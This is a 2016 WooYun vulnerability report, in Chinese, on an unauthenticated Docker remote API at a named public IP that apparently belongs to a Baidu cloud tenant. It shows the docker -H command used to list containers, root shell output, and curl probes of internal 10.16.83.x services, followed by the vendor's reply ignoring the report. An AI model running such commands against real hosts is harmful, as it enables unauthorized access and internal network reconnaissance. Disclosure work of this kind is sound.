当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209509

漏洞标题:新姿势之获取百度机器root权限

相关厂商:百度

漏洞作者: 黑客,绝对是黑客

提交时间:2016-05-17 03:05

修复时间:2016-05-17 11:41

公开时间:2016-05-17 11:41

漏洞类型:

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

请允许我再刷一个~
什么时候有first blood效果
预告!drops分析文章即将发布

详细说明:

docker remote api未授权访问

http://180.76.161.55:2375


查看运行的容器

docker -H tcp://180.76.161.55:2375 ps
CONTAINER ID        IMAGE                                                                COMMAND                  CREATED             STATUS              PORTS                    NAMES
d294b4eed64f        registry.bae.bj.baidubce.com/public/ubuntu12.04_web_php5.5:6653-91   "/usr/bin/tini -- /us"   7 weeks ago         Up 7 weeks          0.0.0.0:8888->8080/tcp   grave_williams
e6ba8c1ca7e8        swarm                                                                "/swarm join --advert"   7 weeks ago         Up 7 weeks          2375/tcp                 sick_lichterman


域名证明为百度

registry.bae.bj.baidubce.com


拿root权限,过程请参考之后发布的drops文章
ifconfig

root@wjl-test-2-1:~# ifconfig
docker0   Link encap:Ethernet  HWaddr 02:42:df:68:95:78
          inet addr:172.17.0.1  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:dfff:fe68:9578/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:933462 errors:0 dropped:0 overruns:0 frame:0
          TX packets:889024 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:77456385 (77.4 MB)  TX bytes:119620987 (119.6 MB)
eth0      Link encap:Ethernet  HWaddr fa:16:3e:75:d9:b9
          inet addr:192.168.2.189  Bcast:192.168.255.255  Mask:255.255.0.0
          inet6 addr: fe80::f816:3eff:fe75:d9b9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1400  Metric:1
          RX packets:13544982 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11278565 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2681279156 (2.6 GB)  TX bytes:2649540661 (2.6 GB)


registry.bae.bj.baidubce.com内网ip 10.16.83.153

root@wjl-test-2-1:~# ping registry.bae.bj.baidubce.com
PING registry.bae.bj.baidubce.com (10.16.83.153) 56(84) bytes of data.
64 bytes from 10.16.83.153: icmp_req=1 ttl=61 time=0.300 ms
64 bytes from 10.16.83.153: icmp_req=2 ttl=61 time=0.314 ms
64 bytes from 10.16.83.153: icmp_req=3 ttl=61 time=0.274 ms


经过测试发现与
WooYun: 一不小心走进了百度内网
漏洞在同一网段

root@wjl-test-2-1:~# curl 10.16.83.164:8080
     __          _     __
    / /_  ____ _(_)___/ /_  __      _________  _____
   / __ \/ __ `/ / __  / / / /_____/ ___/ __ \/ ___/
  / /_/ / /_/ / / /_/ / /_/ /_____/ /  / /_/ / /__
 /_.___/\__,_/_/\__,_/\__,_/     /_/  / .___/\___/
                                     /_/
User Manual : http://wiki.baidu.com/display/RPC
/status : Status of services
/connections : List all connections
/flags : List all gflags
  /flags/port : List the gflag
  /flags/guard_page_size;help* : List multiple gflags with glob patterns (Use $ instead of ? to match single character)
  /flags/NAME?setvalue=VALUE : Change a gflag, validator will be called. User is responsible for thread-safety and consistency issues.
/vars : List all exposed bvars
  /vars/rpc_num_sockets : List the bvar
  /vars/rpc_server*_count;iobuf_blo$k_* : List multiple bvars with glob patterns (Use $ instead of ? to match single character)
/rpcz : Recent RPC calls(disabled)
  /rpcz/stats : Statistics of rpcz
  /rpcz?time=2016/05/17-00:05:28 : RPC calls before the time
  /rpcz?time=2016/05/17-00:05:28&max_scan=10 : N RPC calls at most before the time
  Other filters: min_latency, min_request_size, min_response_size, log_id, error_code
  /rpcz?trace=N : Recent RPC calls whose trace_id is N
  /rpcz?trace=N&span=M : Recent RPC calls whose trace_id is N and span_id is M
/hotspots/cpu : Profiling CPU (disabled)
/hotspots/heap : Profiling heap (disabled)
/hotspots/growth : Profiling growth of heap (disabled)
curl -H 'Content-Type: application/json' -d 'JSON' 10.63.28.21:8002/ServiceName/MethodName : Call method by http+json
/version : Version of this server, set by Server::set_version()
/health : Test healthy
/vlog : List all VLOG callsites
/sockets : Check status of a Socket
/bthreads : Check status of a bthread
/ids : Check status of a bthread_id
/protobufs : List all protobuf services and messages
/list : json signature of methods
/threads : Check pstack (disabled)
/dir : Browse directories and files (disabled)


root@wjl-test-2-1:~# curl 10.16.83.151
[cf971f2d3a042b53308e9696d4923bdb] Not allowed to access builtin services, try ServerOptions.internal_port=8222 instead if you're inside Baidu's network


已证明,不再深入

漏洞证明:

修复方案:

版权声明:转载请注明来源 黑客,绝对是黑客@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-17 11:41

厂商回复:

赞这个提交!很cool,但是,但是,经过我们排查,这个漏洞非百度及开放云漏洞。我们开放云的客户在虚机上使用了BAE公共docker镜像搭建了docker服务来测试,并且开启了remote api,却没有认证!客户说,这个只是他的测试帐号,明天将会重装,允许我们提前忽略来配合drops文章的发布,非常期待!

最新状态:

2016-05-17:至于10.16.83.X,该段设计之初就是暴露给北京region的云上租户虚机,提供的都是公共服务。如果发现公共服务存在漏洞,欢迎通过BSRC或者WooYun报告给我们。